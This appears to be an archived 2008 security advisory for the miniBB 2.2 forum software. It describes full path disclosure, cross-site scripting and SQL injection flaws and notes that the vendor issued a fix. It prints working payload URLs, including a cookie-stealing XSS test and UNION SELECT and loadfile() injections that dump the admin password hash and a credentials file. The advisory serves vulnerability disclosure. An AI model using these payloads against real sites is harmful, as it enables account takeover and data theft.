what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

minibb-xsssql.txt

minibb-xsssql.txt
Posted Apr 25, 2008
Authored by __GiReX__ | Site girex.altervista.org

miniBB version 2.2 suffers from cross site scripting and SQL injection vulnerabilities.

tags | exploit, vulnerability, xss, sql injection
SHA-256 | 03b72bbb881dccb2babdd5d0a84836f4faf0f23c2bf2f215996040ad8c876536

minibb-xsssql.txt

Change Mirror Download
# Author:  __GiReX__
# Homepage: girex.altervista.org
# Date: 21/04/2008

# CMS: miniBB 2.2 (and maybe prior)
# Site: minibb.net

# Bug 1: Full Path Disclosure
# Bug 2: Cross Site Scripting
# Bug 3: Remote SQL Injection

# Need: register_globals = On
---------------------------------------

# 21/04/2008 Vendor informed
# 22/04/2008 miniBB 2.2a released (where they are fixed)
# 25/04/2008 Public advisory

---------------------------------------
# Bug 1: Full Path Disclosure

# Vuln Code: bb_func_regusr.php

25. $languageDown=makeValuedDropDown($glang,'language');

# $glang is empty and it should be an array.
# So for get a full path disclosure into php warning:

# PoC: [host]/[path]/index.php?action=registernew&glang=1
----------------------------------------------------------------------------------

----------------------------------------
# Bug 2: Cross Site Scripting

# PoC: [host]/[path]/index.php?action=registernew&glang[]=<script>alert(document.cookie)</script>
----------------------------------------------------------------------------------

----------------------------------------
# Bug 3: Remote SQL Injection

# Vuln Code: setup_mysql.php

30. function db_simpleSelect($sus,$table='',$fields='',$uniF='',$uniC='',$uniV='',$orderby='',$limit='',$uniF2='',
$uniC2='',$uniV2='',$and2=true,$groupBy=''){
if(!$sus){
...
42. $xtr=(!isset($GLOBALS['xtr'])?'':$GLOBALS['xtr']);
$sql='SELECT '.$fields.' FROM '.$table.$where.' '.$xtr.' '.$groupBy.' '.$orderby.' '.$limit;
$result=mysql_query($sql);
...
53. elseif($sus==2){
$xtr=(isset($GLOBALS['xtr'])?$GLOBALS['xtr']:'');
return mysql_result(mysql_query('SELECT '.$fields.' FROM '.$table.' '.$w.' '.$uniF.$uniC.$uniV.' '.$a.' '.$uniF2
.$uniC2.$uniV2.' '.$xtr),0);

# The var $xtr is empty if getClForums() was not called.
# It can be overwritten to manipulate the SQL query if register_globals = On.

----------------------------------------------------------------------------------
# Check Vuln: [host]/[path]/index.php?action=userinfo&user=-1&xtr=OR+1

# If admin's profile is displayed, it's vulnerable!
----------------------------------------------------------------------------------
----------------------------------------------------------------------------------
# PoC: [host]/[path]/index.php?action=userinfo&user=-1
&xtr=UNION+SELECT+0,concat(username,0x3a,user_password),0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+minibbtable_users+
WHERE+user_id=1

# Admin's login and hash will be displayed.
# These are default's tables and columns, they can be different, use information_schema to find them.
----------------------------------------------------------------------------------
----------------------------------------------------------------------------------
# Or with the path disclosure of Bug 1, you can try to loadfile() setup_options.php
# where there are stored database and admin's login in plain/text.

# PoC: [host]/[path]/index.php?action=userinfo&user=-1
&xtr=UNION+SELECT+0,loadfile('[full_path]/setup_options.php'),0,0,0,0,0,0,0,0,0,0,0,0,0

# Encode in Hex loadfile()'s parameter if magic_quotes_gpc = On
----------------------------------------------------------------------------------


Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    14 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close